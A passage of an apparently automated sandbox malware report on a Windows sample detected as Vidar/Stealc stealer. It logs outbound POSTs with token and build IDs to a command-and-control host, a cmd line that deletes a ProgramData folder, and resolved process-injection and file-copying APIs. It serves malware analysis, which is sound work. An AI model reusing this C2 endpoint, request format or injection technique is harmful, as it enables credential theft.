RRQAlFGKKYwo/ClAooATNJTqTFIAxRjinCmmgCO4/487j/rn/AFFZ+mf69/8AcrQuciyuP9z+orP0z/Xv/uU4/CwRqUtGKAKQBikp2KMUhXG4pcU4Clx/nNFwuMxRT8UBTRcVxoFGKeFPpThG3pSuFyLFLipfLx1IFNOwdZBS5hXG4o20vmRDuT9BQZ0HSMn6mi7HdsNtKEppuG7KoppmkPVsfSi0gtImEZ9DS7MdcD8arF2PVj+dNzRysORlr5
2024-11-25 09:59:43 UTC	16355	OUT	Data Raw: 57 72 57 4f 71 79 51 2f 5a 45 76 49 56 58 55 34 4c 47 65 4f 5a 30 63 37 4a 57 4b 71 36 73 46 58 75 43 4d 45 48 71 44 6e 72 55 2b 33 77 4e 37 63 69 2b 35 46 66 56 4d 31 74 64 56 48 2f 34 45 2f 55 75 30 56 51 68 31 6d 77 76 72 53 34 75 62 4e 4c 71 48 37 4c 63 72 42 4e 46 63 4f 72 37 67 2b 37 61 36 73 46 58 75 70 42 47 44 31 42 7a 56 2b 76 51 6f 59 69 46 65 50 4e 41 38 66 46 59 4f 72 68 5a 38 6c 51 4b 4b 4f 61 59 7a 6f 72 68 5a 4a 42 45 67 56 35 4a 4a 43 4d 37 55 52 53 37 45 44 75 63 41 34 48 63 31 70 4f 63 59 52 63 70 62 49 78 70 30 35 56 5a 71 45 46 64 73 66 56 2f 54 39 63 31 50 53 34 48 68 73 62 73 77 78 75 2b 39 6c 45 61 4e 6c 73 41 5a 35 42 37 41 56 6a 32 6c 39 46 71 46 2f 70 61 77 36 5a 72 4d 4d 46 36 74 77 38 66 6d 41 4d 62 67 4a 45 7a 71 49 32 38 73 Data Ascii: WrWOqyQ/ZEvIVXU4LGeOZ0c7JWKq6sFXuCMEHqDnrU+3wN7ci+5FfVM1tdVH/4E/Uu0VQh1mwvrS4ubNLqH7LcrBNFcOr7g+7a6sFXupBGD1BzV+vQoYiFePNA8fFYOrhZ8lQKKOaYzorhZJBEgV5JJCM7URS7EDucA4Hc1pOcYRcpbIxp05VZqEFdsfV/T9c1PS4Hhsbswxu+9lEaNlsAZ5B7AVj2l9FqF/paw6ZrMMF6tw8fmAMbgJEzqI28s
2024-11-25 09:59:43 UTC	16223	OUT	Data Raw: 46 46 46 41 78 4f 39 46 4c 53 55 41 46 46 46 4a 51 4d 4b 4b 4b 51 30 44 43 69 69 6b 6f 51 42 51 61 4b 51 30 78 68 52 52 52 51 41 6c 46 46 46 41 78 44 52 53 30 6c 41 42 53 55 74 4a 51 4d 4b 53 67 30 55 44 51 55 6c 42 6f 6f 47 4a 52 51 61 4b 41 41 30 6c 46 46 4d 59 6c 46 46 42 6f 41 53 6b 70 61 54 76 51 4d 4b 4b 4b 44 51 4d 53 6b 4e 4c 53 47 67 59 55 6c 4c 53 55 41 4a 52 52 52 51 4d 53 69 69 69 67 59 6c 4a 53 30 6c 41 77 70 4b 57 6b 70 6a 43 6b 70 61 53 67 59 6c 42 6f 6f 4e 41 30 4a 53 55 74 4a 51 41 55 30 30 36 6d 6d 67 59 55 55 55 55 44 45 70 4b 44 52 51 4d 44 53 55 55 55 44 45 6f 6f 6f 6f 47 4a 53 55 47 69 67 61 43 6b 6f 70 4f 39 41 78 61 51 30 47 67 30 41 4a 53 64 71 4b 4b 43 68 4b 51 30 34 30 30 30 44 51 74 4a 52 52 51 4d 54 36 55 6c 4c 53 55 41 49 65 Data Ascii: FFFAxO9FLSUAFFFJQMKKKQ0DCiikoQBQaKQ0xhRRRQAlFFFAxDRS0lABSUtJQMKSg0UDQUlBooGJRQaKAA0lFFMYlFFBoASkpaTvQMKKKDQMSkNLSGgYUlLSUAJRRRQMSiiigYlJS0lAwpKWkpjCkpaSgYlBooNA0JSUtJQAU006mmgYUUUUDEpKDRQMDSUUUDEooooGJSUGigaCkopO9AxaQ0Gg0AJSdqKKChKQ04000DQtJRRQMT6UlLSUAIe
2024-11-25 09:59:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:44 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49789	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:46 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCGDBKEGHIEBGDBFHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:46 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 47 44 42 4b 45 47 48 49 45 42 47 44 42 46 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------CBGCGDBKEGHIEBGDBFHDContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------CBGCGDBKEGHIEBGDBFHDContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------CBGCGDBKEGHIEBGDBFHDCont
2024-11-25 09:59:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49795	49.13.32.95	443	6544	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 09:59:48 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBFHDHJKKJDHJJJJKEG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 09:59:48 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 64 32 35 61 30 62 31 64 36 38 39 38 64 37 34 63 65 36 31 35 64 65 36 37 61 31 36 31 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 63 30 32 65 66 65 31 63 66 62 32 61 36 32 66 33 36 66 33 33 66 66 66 30 32 37 34 66 62 34 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 0d 0a 43 6f 6e 74 Data Ascii: ------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="token"bd25a0b1d6898d74ce615de67a161aa3------GDBFHDHJKKJDHJJJJKEGContent-Disposition: form-data; name="build_id"fc02efe1cfb2a62f36f33fff0274fb41------GDBFHDHJKKJDHJJJJKEGCont
2024-11-25 09:59:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 09:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 09:59:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	04:58:54
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xd50000
File size:	281'600 bytes
MD5 hash:	0ABCF5F274CF19C6F9C75954E9B6A182
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:59:49
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\FCAKFCGCGIEG" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:59:49
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:59:49
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xe50000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	15.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	16

Executed Functions

Function 00D6A132 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00D691DC), ref: 00D6A146
GetProcAddress.KERNEL32 ref: 00D6A15D
GetProcAddress.KERNEL32 ref: 00D6A174
GetProcAddress.KERNEL32 ref: 00D6A18B
GetProcAddress.KERNEL32 ref: 00D6A1A2
GetProcAddress.KERNEL32 ref: 00D6A1B9
GetProcAddress.KERNEL32 ref: 00D6A1D0
GetProcAddress.KERNEL32 ref: 00D6A1E7
GetProcAddress.KERNEL32 ref: 00D6A1FE
GetProcAddress.KERNEL32 ref: 00D6A215
GetProcAddress.KERNEL32 ref: 00D6A22C
GetProcAddress.KERNEL32 ref: 00D6A243
GetProcAddress.KERNEL32 ref: 00D6A25A
GetProcAddress.KERNEL32 ref: 00D6A271
GetProcAddress.KERNEL32 ref: 00D6A288
GetProcAddress.KERNEL32 ref: 00D6A29F
GetProcAddress.KERNEL32 ref: 00D6A2B6
GetProcAddress.KERNEL32 ref: 00D6A2CD
GetProcAddress.KERNEL32 ref: 00D6A2E4
GetProcAddress.KERNEL32 ref: 00D6A2FB
GetProcAddress.KERNEL32 ref: 00D6A312
GetProcAddress.KERNEL32 ref: 00D6A329
GetProcAddress.KERNEL32 ref: 00D6A340
GetProcAddress.KERNEL32 ref: 00D6A357
GetProcAddress.KERNEL32 ref: 00D6A36E
GetProcAddress.KERNEL32 ref: 00D6A385
GetProcAddress.KERNEL32 ref: 00D6A39C
GetProcAddress.KERNEL32 ref: 00D6A3B3
GetProcAddress.KERNEL32 ref: 00D6A3CA
GetProcAddress.KERNEL32 ref: 00D6A3E1
GetProcAddress.KERNEL32 ref: 00D6A3F8
GetProcAddress.KERNEL32 ref: 00D6A40F
GetProcAddress.KERNEL32 ref: 00D6A426
GetProcAddress.KERNEL32 ref: 00D6A43D
GetProcAddress.KERNEL32 ref: 00D6A454
GetProcAddress.KERNEL32 ref: 00D6A46B
GetProcAddress.KERNEL32 ref: 00D6A482
GetProcAddress.KERNEL32 ref: 00D6A499
GetProcAddress.KERNEL32 ref: 00D6A4B0
GetProcAddress.KERNEL32 ref: 00D6A4C7
GetProcAddress.KERNEL32 ref: 00D6A4DE
GetProcAddress.KERNEL32 ref: 00D6A4F5
GetProcAddress.KERNEL32 ref: 00D6A50C
GetProcAddress.KERNEL32(CreateProcessA), ref: 00D6A522
GetProcAddress.KERNEL32(GetThreadContext), ref: 00D6A538
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00D6A54E
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00D6A564
GetProcAddress.KERNEL32(ResumeThread), ref: 00D6A57A
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00D6A590
GetProcAddress.KERNEL32(SetThreadContext), ref: 00D6A5A6
LoadLibraryA.KERNEL32(00D691DC), ref: 00D6A5B7
LoadLibraryA.KERNEL32 ref: 00D6A5C8
LoadLibraryA.KERNEL32 ref: 00D6A5D9
LoadLibraryA.KERNEL32 ref: 00D6A5EA
LoadLibraryA.KERNEL32 ref: 00D6A5FB
LoadLibraryA.KERNEL32 ref: 00D6A60C
LoadLibraryA.KERNEL32 ref: 00D6A61D
LoadLibraryA.KERNEL32 ref: 00D6A62E
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00D6A63E
GetProcAddress.KERNEL32(75FD0000), ref: 00D6A659
GetProcAddress.KERNEL32 ref: 00D6A670
GetProcAddress.KERNEL32 ref: 00D6A687
GetProcAddress.KERNEL32 ref: 00D6A69E
GetProcAddress.KERNEL32 ref: 00D6A6B5
GetProcAddress.KERNEL32(734B0000), ref: 00D6A6D4
GetProcAddress.KERNEL32 ref: 00D6A6EB
GetProcAddress.KERNEL32 ref: 00D6A702
GetProcAddress.KERNEL32 ref: 00D6A719
GetProcAddress.KERNEL32 ref: 00D6A730
GetProcAddress.KERNEL32 ref: 00D6A747
GetProcAddress.KERNEL32 ref: 00D6A75E
GetProcAddress.KERNEL32 ref: 00D6A775
GetProcAddress.KERNEL32(763B0000), ref: 00D6A790
GetProcAddress.KERNEL32 ref: 00D6A7A7
GetProcAddress.KERNEL32 ref: 00D6A7BE
GetProcAddress.KERNEL32 ref: 00D6A7D5
GetProcAddress.KERNEL32 ref: 00D6A7EC
GetProcAddress.KERNEL32(750F0000), ref: 00D6A80B
GetProcAddress.KERNEL32 ref: 00D6A822
GetProcAddress.KERNEL32 ref: 00D6A839
GetProcAddress.KERNEL32 ref: 00D6A850
GetProcAddress.KERNEL32 ref: 00D6A867
GetProcAddress.KERNEL32 ref: 00D6A87E
GetProcAddress.KERNEL32(75A50000), ref: 00D6A89D
GetProcAddress.KERNEL32 ref: 00D6A8B4
GetProcAddress.KERNEL32 ref: 00D6A8CB
GetProcAddress.KERNEL32 ref: 00D6A8E2
GetProcAddress.KERNEL32 ref: 00D6A8F9
GetProcAddress.KERNEL32 ref: 00D6A910
GetProcAddress.KERNEL32 ref: 00D6A927
GetProcAddress.KERNEL32 ref: 00D6A93E
GetProcAddress.KERNEL32 ref: 00D6A955
GetProcAddress.KERNEL32(75070000), ref: 00D6A970
GetProcAddress.KERNEL32 ref: 00D6A987
GetProcAddress.KERNEL32 ref: 00D6A99E
GetProcAddress.KERNEL32 ref: 00D6A9B5
GetProcAddress.KERNEL32 ref: 00D6A9CC
GetProcAddress.KERNEL32(74E50000), ref: 00D6A9E7
GetProcAddress.KERNEL32 ref: 00D6A9FE
GetProcAddress.KERNEL32(75320000), ref: 00D6AA19
GetProcAddress.KERNEL32 ref: 00D6AA30
GetProcAddress.KERNEL32(6F060000), ref: 00D6AA4F
GetProcAddress.KERNEL32 ref: 00D6AA66
GetProcAddress.KERNEL32 ref: 00D6AA7D
GetProcAddress.KERNEL32 ref: 00D6AA94
GetProcAddress.KERNEL32 ref: 00D6AAAB
GetProcAddress.KERNEL32 ref: 00D6AAC2
GetProcAddress.KERNEL32 ref: 00D6AAD9
GetProcAddress.KERNEL32 ref: 00D6AAF0
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00D6AB06
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00D6AB1C
GetProcAddress.KERNEL32(74E00000), ref: 00D6AB37
GetProcAddress.KERNEL32 ref: 00D6AB4E
GetProcAddress.KERNEL32 ref: 00D6AB65
GetProcAddress.KERNEL32 ref: 00D6AB7C
GetProcAddress.KERNEL32(74DF0000), ref: 00D6AB97
GetProcAddress.KERNEL32(6C7F0000), ref: 00D6ABB2
GetProcAddress.KERNEL32 ref: 00D6ABC9
GetProcAddress.KERNEL32 ref: 00D6ABE0
GetProcAddress.KERNEL32 ref: 00D6ABF7
GetProcAddress.KERNEL32(6C600000,SymMatchString), ref: 00D6AC11

Strings

InternetSetOptionA, xrefs: 00D6AB0C
SetThreadContext, xrefs: 00D6A596
GetThreadContext, xrefs: 00D6A528
dbghelp.dll, xrefs: 00D6A634
VirtualAllocEx, xrefs: 00D6A554
ReadProcessMemory, xrefs: 00D6A53E
CreateProcessA, xrefs: 00D6A512
HttpQueryInfoA, xrefs: 00D6AAF6
ResumeThread, xrefs: 00D6A56A
WriteProcessMemory, xrefs: 00D6A580
SymMatchString, xrefs: 00D6AC0B

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
API String ID: 2238633743-2740034357
Opcode ID: 6aa280a2b17a3d1c0425f59582d4f0dc528be059f863964229826f91d919db68
Instruction ID: d6579be25f2fd2eb604223a1728eed8fecf84a2e910cabcf7a34ac6c4a0ca5b0
Opcode Fuzzy Hash: 6aa280a2b17a3d1c0425f59582d4f0dc528be059f863964229826f91d919db68
Instruction Fuzzy Hash: 0B52D67944120EFFDB8A9F66FE499643BA6F7083453004127FA5582234E73299B8FF58

Function 00D66A05 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00D66A59
FindFirstFileA.KERNEL32(?,?), ref: 00D66A70
_memset.LIBCMT ref: 00D66A8C
_memset.LIBCMT ref: 00D66A9D
StrCmpCA.SHLWAPI(?,00D87A38), ref: 00D66ABE
StrCmpCA.SHLWAPI(?,00D87A3C), ref: 00D66AD8
wsprintfA.USER32 ref: 00D66AFF
StrCmpCA.SHLWAPI(?,00D8766E), ref: 00D66B13
wsprintfA.USER32 ref: 00D66B3C
wsprintfA.USER32 ref: 00D66B53

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

_memset.LIBCMT ref: 00D66B65
lstrcatA.KERNEL32(?,?), ref: 00D66B7A
strtok_s.MSVCRT ref: 00D66BBF
_memset.LIBCMT ref: 00D66BD1
lstrcatA.KERNEL32(?,?), ref: 00D66BE6
strtok_s.MSVCRT ref: 00D66BFF
PathMatchSpecA.SHLWAPI(?,00000000), ref: 00D66C14
DeleteFileA.KERNEL32(?,00D87A68,00D8766F), ref: 00D66CCD
CopyFileA.KERNEL32(?,?,00000001), ref: 00D66CDD

Part of subcall function 00D63DFD: CreateFileA.KERNEL32(00D66CE9,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00D66CE9,?), ref: 00D63E18

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D66CF3
DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00D66CFE
strtok_s.MSVCRT ref: 00D66D24
FindNextFileA.KERNELBASE(?,?), ref: 00D66E42
FindClose.KERNEL32(?), ref: 00D66E62

Strings

%s\%s, xrefs: 00D66B4D
%s\%s, xrefs: 00D66AF9
%s\*.*, xrefs: 00D66A4D
%s\%s\%s, xrefs: 00D66B36

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 956187361-332874205
Opcode ID: f73a62d0da9ac601e8a438e18bb4538f82ab663e6160acba1f365ad1f6f0413f
Instruction ID: 5c9f6a79f10035c0428bc0939c7f17c419d071844974e5f95967a25d5ec23bdf
Opcode Fuzzy Hash: f73a62d0da9ac601e8a438e18bb4538f82ab663e6160acba1f365ad1f6f0413f
Instruction Fuzzy Hash: B9C1E972D0021EABCF22AB64DC46AEE777DEB08304F0444A5FA09A3151DB35DB999F71

Function 00D67D20 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00D67D67
FindFirstFileA.KERNEL32(?,?), ref: 00D67D7E
StrCmpCA.SHLWAPI(?,00D87AF4), ref: 00D67D9F
StrCmpCA.SHLWAPI(?,00D87AF8), ref: 00D67DB9
wsprintfA.USER32 ref: 00D67DE0
StrCmpCA.SHLWAPI(?,00D876B6), ref: 00D67DF4
wsprintfA.USER32 ref: 00D67E11
wsprintfA.USER32 ref: 00D67E28
PathMatchSpecA.SHLWAPI(?,?), ref: 00D67E3E
lstrcatA.KERNEL32(?), ref: 00D67E74
lstrcatA.KERNEL32(?,00D87B10), ref: 00D67E86
lstrcatA.KERNEL32(?,?), ref: 00D67E99
lstrcatA.KERNEL32(?,00D87B14), ref: 00D67EAB
lstrcatA.KERNEL32(?,?), ref: 00D67EBF
CopyFileA.KERNEL32(?,?,00000001), ref: 00D67F78
DeleteFileA.KERNEL32(?), ref: 00D67FEC
FindNextFileA.KERNEL32(?,?), ref: 00D6804E
FindClose.KERNEL32(?), ref: 00D68062

Strings

%s\%s, xrefs: 00D67DDA
%s\%s, xrefs: 00D67E22
%s\*, xrefs: 00D67D5B

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\%s$%s\*
API String ID: 2178766154-445461498
